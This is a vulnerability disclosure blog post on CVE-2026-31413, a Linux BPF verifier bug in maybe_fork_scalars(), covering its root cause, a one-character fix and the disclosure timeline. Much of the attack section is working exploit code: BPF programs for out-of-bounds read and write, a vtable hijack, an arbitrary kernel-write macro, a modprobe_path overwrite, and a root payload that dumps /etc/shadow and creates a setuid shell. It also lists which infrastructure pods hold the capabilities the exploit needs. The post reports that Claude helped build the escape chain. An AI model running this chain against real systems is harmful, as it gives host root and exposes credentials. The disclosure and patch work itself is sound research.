Original research · CVE-2026-31413
A soundness bug in the Linux BPF verifier's maybe_fork_scalars() function. One + 1 causes the verifier to skip an ALU instruction on a forked path, turning BPF_OR into arbitrary kernel R/W, vtable hijack, and full container escape to host root.
NadSec Research
Container escape via BPF verifier soundness bug.
Bug class
Verifier soundness
Register value divergence
Impact
Host root
Arbitrary kernel R/W → escape
Required caps
CAP_BPF +
CAP_PERFMON · CAP_NET_ADMIN
Fix
1 character
insn_idx + 1 → insn_idx
All Blog Posts
NadSec original research
Full exploit chain running inside a Docker container with CAP_BPF + CAP_SYSLOG + CAP_PERFMON. No --privileged, no SYS_ADMIN. The exploit overwrites modprobe_path, triggers an unknown binary format, and the kernel runs the payload as root on the host.
I found a soundness bug in the Linux BPF verifier - a + 1 in a push_stack()
call that causes the verifier to skip an ALU instruction on a forked path. For
BPF_OR, this means the verifier tracks dst = 0 while the CPU computes
0 | K = K. I wrote a full container escape: OOB read/write from a BPF map,
vtable hijack, modprobe_path overwrite, root on the host. Then I wrote a
one-character fix and got it merged.
Exploit source, patches, and selftests: GitHub.
| CVE | CVE-2026-31413 |
| Bug class | Verifier soundness - register value divergence |
| Root cause | push_stack(env, env->insn_idx + 1, ...) skips ALU insn on forked path |
| Introduced | bffacdb80b93 - Linux 7.0-rc1 (Jan 14, 2026) |
| Fixed | c845894ebd6f - Linux 7.0-rc5 (Mar 22, 2026) |
| Affected | 6.12.75+ (stable backport dea9989a3f) through 7.0-rc4 |
| Impact | Arbitrary kernel R/W → container escape → host root |
| Required | CAP_BPF + CAP_PERFMON + CAP_NET_ADMIN |
| Fix | One character: insn_idx + 1 → insn_idx |
maybe_fork_scalars() forks verifier state when it sees ARSH + AND/OR with a
constant. The pushed path gets dst = 0 and skips the ALU instruction. For AND
that's fine: 0 & K = 0. For OR it's wrong: 0 | K = K, not 0.
The verifier thinks the register is zero. The CPU has K. I used that to build
arbitrary OOB read/write from a BPF map value, leaked the map's kernel address,
built a fake bpf_map_ops vtable, redirected map_push_elem through
array_map_get_next_key for arbitrary write, and overwrote modprobe_path.
Trigger an unknown binary format, kernel runs my script as root. In a container,
full host escape.
One-character fix. Merged by Alexei Starovoitov on March 22. CVE-2026-31413 assigned by Greg Kroah-Hartman on April 12.
eBPF lets you load small programs into the kernel - packet filters, tracing hooks, security policies - without compiling a kernel module. The catch is that you're injecting code into ring 0. If that code has a bug, it's a kernel bug.
So before any BPF program runs, the kernel's verifier simulates every possible execution path. It tracks what each register holds (a pointer? a scalar? what range?), checks every memory access against map bounds, and rejects anything that could read or write out of bounds. If the verifier says a program is safe, the JIT compiles it to native machine code and runs it at full kernel privilege. There are no runtime bounds checks after that point. The verifier is the security boundary.
This is why verifier soundness bugs are different from normal memory corruption. With a heap overflow or UAF, you get one corruption primitive and have to work from there - spray the heap, groom objects, race a window. With a verifier bug, you get the kernel to believe a lie about a register's value. Every bounds check that depends on that register passes. The kernel approved your OOB access. It runs it without question. If you can line the register state up correctly, you get a clean and reliable primitive out of it.
I was auditing maybe_fork_scalars() - new code, added January 2026 in
bffacdb80b93. State forking is always interesting because it's where the
verifier splits into parallel exploration paths, and if any path tracks an
incorrect value, everything downstream of that path is unsound.
The function forks when it sees ARSH + AND/OR with a constant source. Pushed
path gets dst = 0, skips the ALU instruction. I was reading the
push_stack(env, env->insn_idx + 1, ...) line and it clicked immediately - the
+ 1 means the pushed path never executes the ALU op. For AND, 0 & K = 0, so
skipping is fine. For OR, 0 | K = K. The pushed path thinks the result is 0
when it's actually K.
I wrote a BPF program that evening. ARSH 63 to get {0, -1}, OR with a
constant, conditional branch to separate the verifier paths, then add the
"zero" register to a map pointer. The verifier approved map_value + 0. The
CPU accessed map_value + K. KASAN confirmed the out-of-bounds access in
testing.
OOB read/write by the next morning. Container escape by the next night. I used
Claude (Opus 4.5) throughout - for working through the verifier's state
forking logic, brainstorming exploitation primitives, and turning the OOB
into a full escape chain. The vtable hijack approach came out of a back-and-forth
where Claude walked through the bpf_map_ops function pointers looking for
callable gadgets.
Commit bffacdb80b93 ("bpf: Recognize special arithmetic shift in the
verifier") landed January 14, 2026 in 7.0-rc1. Alexei Starovoitov, co-developed
by Puranjay Mohan. It added maybe_fork_scalars() to handle an LLVM
DAGCombiner pattern:
w2 s>>= 31 // arithmetic shift right: w2 becomes 0 or -1
w2 &= -134 // AND with constant K
LLVM lowers select_cc setlt X, 0, A, 0 to sra + and. After the arithmetic
right shift, the register is either 0 (non-negative input) or -1 (all ones).
AND with a constant gives 0 or K.
The verifier can't track {0, K} in a single bpf_reg_state - its signed range
[0, K] over-approximates, and that was causing it to reject valid Cilium
programs. The fix: fork the verifier state. One path explores dst = 0, the
other dst = -1, each tracking the precise value.
The implementation:
static int maybe_fork_scalars(struct bpf_verifier_env *env,
struct bpf_insn *insn,
struct bpf_reg_state *dst_reg)
{
// ... condition check: dst range is [-1, 0], src is constant ...
branch = push_stack(env, env->insn_idx + 1, env->insn_idx, false);
// ^^^^^^^^^^^^
// pushed path resumes AFTER the ALU insn
if (IS_ERR(branch))
return PTR_ERR(branch);
regs = branch->frame[branch->curframe]->regs;
__mark_reg_known(®s[insn->dst_reg], 0); // pushed: dst = 0
__mark_reg_known(dst_reg, -1ull); // current: dst = -1
return 0;
}
Two things happen on the pushed path:
0insn_idx + 1 - the instruction after the ALU opFor BPF_AND: dst = 0, skip the AND. Runtime: 0 & K = 0. Match. Sound.
For BPF_OR: dst = 0, skip the OR. Runtime: 0 | K = K. Mismatch.
The verifier sees 0. The CPU has K. Unsound.
The function doesn't check the opcode. It was written for AND - where skipping
the instruction is the same as executing it with dst = 0 - and got applied to
OR too. For OR, that equivalence doesn't hold.
The trigger pattern is five instructions:
r6 = *(u64*)(map_value + 0) // load a positive value (guaranteed by map init)
r6 s>>= 63 // arithmetic shift: r6 = 0 (positive input)
r6 |= K // BUG: verifier forks, pushed path gets r6=0
if r6 s< 0 goto exit // steers verifier paths
r9 += r6 // verifier: r9 += 0 (in-bounds)
// runtime: r9 += K (OOB)
The verifier explores two paths:
Current path (dst = -1): The OR executes, -1 | K is still -1. The
branch r6 s< 0 is taken. The verifier follows the exit. This path is safe and
the verifier confirms it.
Pushed path (dst = 0, skipped OR): r6 = 0. The branch r6 s< 0 is not
taken. The verifier falls through to r9 += r6, sees r9 += 0, and approves the
subsequent memory access as in-bounds.
Runtime (dst = 0, OR executes): The map value is positive, so after ARSH,
r6 = 0. The OR executes: 0 | K = K. The branch K s< 0 is not taken (K is
positive). r9 += K - an out-of-bounds access by K bytes, approved by the
verifier as r9 += 0.
I control K. Arbitrary-offset OOB read or write, relative to any BPF map
value.
The read version stores the leaked data into a second map for userspace retrieval. The write version loads a value from a third map and writes it at the OOB offset. Both pass the verifier.
Here's the full oob_read_prog - this is the actual code from the exploit, not
pseudocode:
static int oob_read_prog(int map_fd, int dst_fd, int offset)
{
int K = -offset;
struct bpf_insn insn[] = {
/* look up map_fd[0] → R0 = pointer to value, load seed into R6 */
BPF_LD_MAP_FD(R1, map_fd),
BPF_MOV64_REG(R2, R10), BPF_ALU64_IMM(BPF_ADD, R2, -8),
BPF_ST_MEM(BPF_DW, R10, -8, 0),
BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0,0,0, 1), /* map_lookup_elem */
BPF_JMP_IMM(BPF_JNE, R0, 0, 2), BPF_MOV64_IMM(R0,0), BPF_EXIT_INSN(),
BPF_LDX_MEM(BPF_DW, R6, R0, 0), /* R6 = seed (positive) */
/* look up dst_fd[0] → R9 = pointer to output buffer */
BPF_LD_MAP_FD(R1, dst_fd),
BPF_MOV64_REG(R2, R10), BPF_ALU64_IMM(BPF_ADD, R2, -8),
BPF_ST_MEM(BPF_DW, R10, -8, 0),
BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0,0,0, 1),
BPF_JMP_IMM(BPF_JNE, R0, 0, 2), BPF_MOV64_IMM(R0,0), BPF_EXIT_INSN(),
BPF_MOV64_REG(R9, R0),
/* look up map_fd[0] again → R8 = base pointer for OOB access */
BPF_LD_MAP_FD(R1, map_fd),
BPF_MOV64_REG(R2, R10), BPF_ALU64_IMM(BPF_ADD, R2, -8),
BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0,0,0, 1),
BPF_JMP_IMM(BPF_JNE, R0, 0, 2), BPF_MOV64_IMM(R0,0), BPF_EXIT_INSN(),
BPF_MOV64_REG(R8, R0),
/* === THE BUG === */
BPF_ALU64_IMM(BPF_ARSH, R6, 63), /* R6 = 0 (positive seed) */
BPF_ALU64_IMM(BPF_OR, R6, K), /* verifier: R6=0, runtime: R6=K */
BPF_MOV64_IMM(R7, 0),
BPF_ALU64_REG(BPF_SUB, R7, R6), /* R7 = -K = offset */
BPF_ALU64_REG(BPF_ADD, R8, R7), /* R8 = map_value + offset (OOB) */
BPF_LDX_MEM(BPF_DW, R0, R8, 0), /* OOB read: 8 bytes */
BPF_STX_MEM(BPF_DW, R9, R0, 0), /* store to output map */
BPF_MOV64_IMM(R0, 0),
BPF_EXIT_INSN(),
};
return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, insn, ARRAY_SIZE(insn));
}
And the OOB write - same ARSH+OR trick, but writes a value from a third map into the OOB offset:
static int oob_write_prog(int map_fd, int val_fd, int offset)
{
int K = -offset;
struct bpf_insn insn[] = {
/* look up map_fd[0], load seed, trigger the bug */
BPF_LD_MAP_FD(R1, map_fd),
BPF_ST_MEM(BPF_W, R10, -4, 0),
BPF_MOV64_REG(R2, R10), BPF_ALU64_IMM(BPF_ADD, R2, -4),
BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0,0,0, 1),
BPF_JMP_IMM(BPF_JEQ, R0, 0, 20), BPF_MOV64_REG(R9, R0),
BPF_LDX_MEM(BPF_DW, R6, R9, 0), /* R6 = seed */
BPF_ALU64_IMM(BPF_ARSH, R6, 63), /* R6 = 0 */
BPF_ALU64_IMM(BPF_OR, R6, K), /* R6 = K (verifier: 0) */
BPF_JMP_IMM(BPF_JSLT, R6, 0, 13), /* skip if negative (verifier path) */
BPF_MOV64_IMM(R7, 0),
BPF_ALU64_REG(BPF_SUB, R7, R6), /* R7 = -K */
BPF_ALU64_REG(BPF_ADD, R9, R7), /* R9 = OOB target */
/* look up val_fd[0] → R8 = value to write */
BPF_LD_MAP_FD(R1, val_fd),
BPF_MOV64_REG(R2, R10), BPF_ALU64_IMM(BPF_ADD, R2, -4),
BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0,0,0, 1),
BPF_JMP_IMM(BPF_JEQ, R0, 0, 4),
BPF_LDX_MEM(BPF_DW, R8, R0, 0), /* R8 = write value */
BPF_STX_MEM(BPF_DW, R9, R8, 0), /* OOB write */
BPF_MOV64_IMM(R0, 0), BPF_JMP_IMM(BPF_JA, 0, 0, 2),
BPF_MOV64_IMM(R0, 0), BPF_JMP_IMM(BPF_JA, 0, 0, 0),
BPF_EXIT_INSN(),
};
return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, insn, ARRAY_SIZE(insn));
}
To trigger either program, I attach it to a socket pair and push a packet through:
static int trigger_bpf_prog(int prog_fd)
{
int socks[2];
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks) < 0) return -1;
setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd));
char buf[64] = "x";
write(socks[1], buf, sizeof(buf));
struct timeval tv = { .tv_sec = 1 };
setsockopt(socks[0], SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv));
read(socks[0], buf, sizeof(buf));
close(socks[0]); close(socks[1]);
return 0;
}
The negate-and-add pattern (R7 = 0 - R6; R8 += R7) lets us reach negative
offsets from the map value - which is where the map's own metadata lives.
The full chain:
BPF_OR divergence (verifier: dst=0, runtime: dst=K)
│
▼
Arbitrary OOB read/write relative to map value
│
├── Read offset -136 → leak freeze_mutex.wait_list → map kernel address
├── Read offset -264 → leak ops vtable → confirm array_map_ops
│
▼
Build fake bpf_map_ops vtable in map value (42 slots from kallsyms)
→ slot 15 (map_push_elem) = array_map_get_next_key
│
▼
Corrupt map header via OOB writes
→ ops → fake vtable
→ map_type → BPF_MAP_TYPE_QUEUE (22)
→ max_entries → 0xFFFFFFFF
│
▼
bpf(BPF_MAP_UPDATE_ELEM) dispatches through map_push_elem
→ array_map_get_next_key(map, value, flags)
→ writes *(u32*)value + 1 to *(u32*)flags
→ flags = attacker-controlled kernel address
│
▼
Overwrite modprobe_path → "/tmpn/mo"
│
▼
Exec unknown binary format → kernel runs /tmpn/mo as root
│
▼
Restore map header → clean exit
A BPF_MAP_TYPE_ARRAY is backed by struct bpf_array, which embeds
struct bpf_map at offset 0. The actual map values start at offset 264 (after
the bpf_array header + alignment). So from value[0], the map's own metadata
sits at known negative offsets:
struct bpf_map (embedded in bpf_array)
┌────────────────────────────────────────┐
offset from val[0] │ │
-264 │ ops (struct bpf_map_ops *) │ ← vtable pointer
-240 │ map_type (u32) │
-236 │ key_size (u32) │
-232 │ value_size (u32) │
-228 │ max_entries (u32) │
│ ... │
-136 │ freeze_mutex.wait_list │ ← points back into struct
│ ... │
0 │ value[0] ← our OOB origin │
└────────────────────────────────────────┘
I verified these with pahole on the 6.12.76-docker vmlinux. On the tested
kernel, the offsets matched exactly.
Two OOB reads give me everything I need:
wait_list at offset -136. This is freeze_mutex.wait_list, a
list_head that points back to itself when the mutex is uncontested. Its value
is &map->freeze_mutex.wait_list - a kernel pointer into the map structure.
Subtract 128 and I have the map's base address. Add 264 and I have the kernel
address of value[0].
ops at offset -264. This is the bpf_map_ops vtable pointer. On an
unmodified kernel it points to the global array_map_ops symbol. I read it to
confirm the kernel isn't patched and to get the vtable address for cloning.
uint64_t wait_list = do_oob_read(victim, scratch, OFF_WAIT_LIST);
uint64_t map_addr = wait_list - 128;
uint64_t val_addr = map_addr + 264;
uint64_t ops = do_oob_read(victim, scratch, OFF_OPS);
if (ops != ARRAY_MAP_OPS) {
fprintf(stderr, "[-] ops mismatch! Kernel might be patched.\n");
return 1;
}
At this point I have: the map's kernel address, the address of my controlled
data (value[0]), and the confirmed vtable pointer.
bpf_map_ops has 42 function pointer slots. If I just zero out the ones I don't
need, the kernel will NULL-deref the first time it touches one. So I resolve
every symbol from /proc/kallsyms and build a complete copy:
uint64_t *vt = (uint64_t *)(val + 8); // offset 8 in value (slot 0 is seed)
vt[ 0] = sym_alloc_check; // map_alloc_check
vt[ 1] = sym_alloc; // map_alloc
vt[ 2] = 0; // map_release (unused path)
vt[ 3] = sym_free; // map_free
vt[ 4] = sym_get_next_key; // map_get_next_key
// ...
vt[12] = sym_lookup_elem; // map_lookup_elem
vt[13] = sym_update_elem; // map_update_elem
vt[14] = sym_delete_elem; // map_delete_elem
vt[15] = ARRAY_GET_NEXT_KEY; // map_push_elem ← THE HIJACK
// ...
vt[40] = sym_mem_usage; // map_mem_usage
Slot 15 is map_push_elem. In the real array_map_ops this is NULL (arrays
don't support push). I replace it with array_map_get_next_key.
Why get_next_key? Its signature is:
int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)
It reads *(u32 *)key, increments it, and writes the result to *(u32 *)next_key. When called through the map_push_elem dispatch path:
int bpf_map_push_elem(struct bpf_map *map, void *value, u64 flags)
→ map->ops->map_push_elem(map, value, flags)
The flags argument lands in the next_key parameter. If I control flags, I
control the write destination. The value written is *(u32 *)value + 1 - a
small integer I can predict by setting the first 4 bytes of my push buffer.
Before I can use the fake vtable, I need to redirect the map to it and change
its type so the kernel dispatches through map_push_elem. Three OOB writes,
executed in order:
// Point ops at my fake vtable (lives at val_addr + 8)
exec_oob_write(prog_wr_ops, scratch, val_addr + 8);
// Disable max_entries bounds check
exec_oob_write(prog_wr_max, scratch, 0xFFFFFFFFULL);
// Change map_type to BPF_MAP_TYPE_QUEUE (22)
exec_oob_write(prog_wr_type, scratch, 22ULL);
The type change is critical. When userspace calls bpf(BPF_MAP_UPDATE_ELEM) on
an array map, the kernel dispatches through map_update_elem. But on a queue
map, the same syscall dispatches through map_push_elem - which now points to
array_map_get_next_key.
I pre-load all six BPF programs (three writes + three restores) before
corrupting anything. Once I corrupt the ops pointer, I can't load new BPF
programs that reference this map - the verifier would follow the fake vtable and
crash. Everything has to be staged in advance.
Now I can write 4 bytes to any kernel address:
#define ARB_WRITE32(addr, val32) do { \
uint32_t _v = (val32); \
uint32_t _pv = _v - 1; \
memset(push_buf, 0, sizeof(push_buf)); \
memcpy(push_buf, &_pv, 4); \
map_push(victim, push_buf, (addr)); \
} while(0)
map_push() calls bpf(BPF_MAP_UPDATE_ELEM) with flags = addr. The kernel
dispatches to my hijacked map_push_elem → array_map_get_next_key(map, push_buf, addr). It reads *(u32 *)push_buf (which is val - 1), adds 1, and
writes val to *(u32 *)addr.
KASAN constraint: writes only succeed at 8-byte aligned addresses on this
kernel. Not a real limitation for modprobe_path.
modprobe_path is a global char[256] in the kernel, default /sbin/modprobe.
When the kernel encounters an executable with an unknown magic number, it invokes
modprobe_path as root to load the appropriate module. Overwrite it with a path
I control, trigger an unknown binary format, and the kernel runs my script as
root.
The target path is /tmpn/mo. I can't write arbitrary strings - I write 4 bytes
at a time via get_next_key's integer increment. But I only need two writes:
// Original: "/sbin/modprobe\0"
// Write "/tmp" at offset 0:
ARB_WRITE32(MODPROBE_PATH + 0, 0x706d742fU); // "/tmp" little-endian
// Write "\0\0\0\0" at offset 8 (null-terminate):
ARB_WRITE32(MODPROBE_PATH + 8, 0x00000000U);
// Bytes 4-7 are untouched: "n/mo" from original "/sbin/modprobe"
// Result: "/tmpn/mo\0"
In container mode, modprobe_path resolves in the init mount namespace - not
the container's. So the payload script has to exist at /tmpn/mo on the host.
With --pid=host or a shared PID namespace, I reach the host filesystem through
/proc/1/root/:
snprintf(payload_script, sizeof(payload_script), "/proc/1/root/tmpn/mo");
For the demo, the orchestrator pre-stages the payload on the host. The exploit
creates the trigger binary - 4 bytes of \xff - and executes it. The kernel
doesn't recognize the format, looks up modprobe_path, finds /tmpn/mo, and
runs it as root.
The payload:
#!/bin/sh
id > /tmp/pwned
cat /etc/shadow >> /tmp/pwned 2>/dev/null
cp /bin/sh /tmp/pwn 2>/dev/null && chmod 04755 /tmp/pwn 2>/dev/null
After the modprobe_path write, I restore the map header - type, max_entries,
ops - using the three pre-loaded restore programs. The map goes back to being a
normal array. No dangling fake vtable, no kernel instability. The exploit is
single-shot and leaves a clean state.
exec_oob_write(prog_rst_type, scratch, orig_type_key);
exec_oob_write(prog_rst_max, scratch, orig_max);
exec_oob_write(prog_rst_ops, scratch, orig_ops);
In my demo environment, the full chain from first OOB read to root shell took a couple of seconds.
The exploit requires CAP_BPF + CAP_PERFMON + CAP_NET_ADMIN. You won't get that
from an unprivileged container or a normal user account on a hardened system.
But there are a lot of contexts where you do have those caps.
If kernel.unprivileged_bpf_disabled=0 (check with sysctl), any local user
can load BPF programs. This used to be the default on older distros and is
sometimes enabled for dev/test environments. On those systems, this is a
straight local privilege escalation - any user to root, no special permissions
needed.
Most modern distros ship with unprivileged_bpf_disabled=1 or =2 (locked), so
this path is closed on default installs of Ubuntu 22.04+, Debian 12+, Fedora,
RHEL 9, etc.
This is where the bug hurts. Standard unprivileged containers drop CAP_BPF, so
they can't trigger the bug. But a lot of infrastructure pods run with elevated
caps:
| Product | Default Privileges | Notes |
|---|---|---|
| Cilium (GKE Dataplane V2) | CAP_SYS_ADMIN + CAP_NET_ADMIN |
Network policy, runs on every node |
| Falco | privileged: true |
Runtime security, mounts /dev |
| Tetragon | privileged: true |
eBPF observability |
| Datadog Agent | CAP_SYS_ADMIN + 7 more |
Metrics, logs, APM |
| Pixie | privileged: true |
eBPF-based observability |
| Tracee | privileged: true or BPF caps |
Aqua's runtime security |
These typically run as DaemonSets - one pod per node, cluster-wide. If an attacker compromises any of these pods (RCE in a web service on the same node, supply chain attack, SSRF into an agent API, etc.), they have the caps needed to run this exploit and escape to host root.
From host root on one node, lateral movement to other nodes is usually possible via the same DaemonSet (shared service accounts, mounted secrets, etc.).
Google GKE uses Cilium as Dataplane V2 by default. If GKE nodes run an unpatched
6.12.x kernel (check your node pool version), any Cilium pod compromise turns
into host root and node takeover. I built the exploit specifically for this
scenario - that's why it's called exploit_gke.c.
Amazon EKS and Azure AKS are also potentially affected if they're running 6.12.x kernels with Cilium or similar BPF-based networking. Need to check specific AMI/VM image versions.
Important caveat: The exploit only works on kernels containing the
vulnerable code (6.12.75-6.12.79, 6.18.x-6.18.20, 6.19.x-6.19.10, 7.0-rc1 to
rc4). Most production K8s clusters run older LTS kernels. Check your node
kernel version with uname -r before assuming exploitability.
Android uses eBPF for network traffic accounting (netd), power profiling, and
memory tracking. Current Android devices (14/15) use 6.1 LTS kernels, which are
not affected. Android 16 may adopt 6.12 LTS - if it does, and if the
vulnerable backport is included, the attack surface would be system services
like netd and system_server that load BPF programs.
This is speculative and depends on Android's kernel adoption timeline. I filed with Android VRP for tracking.
System containers that share the host kernel (unlike VMs) are fully exposed. Compromise the shared kernel = compromise the host + every other container on it. This is different from Docker/containerd where you're escaping to a host that might itself be a VM.
This is a guest kernel bug, not a hypervisor escape. If you run the exploit inside an EC2 instance, you get root on that instance - you don't escape the Nitro hypervisor to the physical host or other tenants. Same for GCE, Azure VMs, KVM, etc. The hardware boundary holds.
| Branch | Affected | Fixed |
|---|---|---|
| 6.12.y (LTS) | dea9989a3f through 6.12.79 |
6.12.80+ |
| 6.18.y | 4c122e8ae149 through 6.18.20 |
6.18.21+ |
| 6.19.y | e52567173ba8 through 6.19.10 |
6.19.11+ |
| mainline | 7.0-rc1 through 7.0-rc4 | 7.0-rc5+ |
Introducing commit: bffacdb80b93 ("bpf: Recognize special arithmetic shift in the verifier")
Fix commit: c845894ebd6f
CAP_BPF is not a safe capability. A verifier bug converts it into arbitrary
kernel read/write. Products that grant it to workload pods should treat it as
CAP_SYS_ADMIN.
One character:
- branch = push_stack(env, env->insn_idx + 1, env->insn_idx, false);
+ branch = push_stack(env, env->insn_idx, env->insn_idx, false);
Instead of pushing the branch to insn_idx + 1 (skipping the ALU instruction),
push to insn_idx - the instruction itself. The pushed path re-executes the
ALU op with dst = 0:
0 & K = 0 ✓0 | K = K ✓The original approach was clever - skip the instruction and hardcode the result,
saving one verifier step on the pushed path. But that optimization only works
when the result of executing the instruction with dst = 0 is zero. That's
true for AND and false for OR. The fix gives up the optimization: just run the
instruction again and let the verifier compute the correct value for any opcode.
I went through three patch revisions:
opcode parameter to maybe_fork_scalars() and set
dst = K for OR, dst = 0 for AND on the pushed path. Worked but added
complexity.insn_idx instead of insn_idx + 1. Simpler, opcode-independent, eliminates
the entire class of skip-vs-execute bugs.Merged as c845894ebd6f on March 22 by Alexei Starovoitov. Selftests in
0ad1734cc559. Reviewed by Eduard Zingerman, acked by Amery Hung.
The selftests cover three cases:
or_scalar_fork_rejects_oob - ARSH 63 + OR 8, value_size=8, access at
offset 8 is OOB → must rejectand_scalar_fork_still_works - regression test, AND path still acceptsor_scalar_fork_allows_inbounds - OR 4, value_size=8, offset 4 is in-bounds
→ must acceptLinus merged d5273fd3ca0b ("Merge tag 'bpf-fixes'") with the note: "Fix
unsound scalar fork for OR instructions (Daniel Wade)".
| Date | Event |
|---|---|
| 2026-01-14 | bffacdb80b93 introduces maybe_fork_scalars() in 7.0-rc1 |
| 2026-03-04 | Bug backported to 6.12.y stable as dea9989a3f |
| 2026-03-11 | I find the bug during verifier audit |
| 2026-03-12 | OOB read/write confirmed, exploit working |
| 2026-03-13 | Container escape PoC complete, video recorded |
| 2026-03-14 | Patch v3 sent to bpf@vger.kernel.org |
| 2026-03-22 | Fix merged by Alexei Starovoitov into bpf/bpf.git |
| 2026-04-06 | Linus merges bpf-fixes tag into mainline |
| 2026-04-12 | CVE-2026-31413 assigned by Greg Kroah-Hartman |
c845894ebd6f ("bpf: Fix unsound scalar forking in maybe_fork_scalars() for BPF_OR")0ad1734cc559 ("selftests/bpf: Add tests for maybe_fork_scalars() OR vs AND handling")bffacdb80b93 ("bpf: Recognize special arithmetic shift in the verifier")CVE-2026-31413 - Fixed in Linux 7.0-rc5. Affected: 6.12.75+ (stable backport) through 7.0-rc4.
Daniel Wade - GitHub · Twitter/X · Bluesky · Mastodon · Medium · danjwade95@gmail.com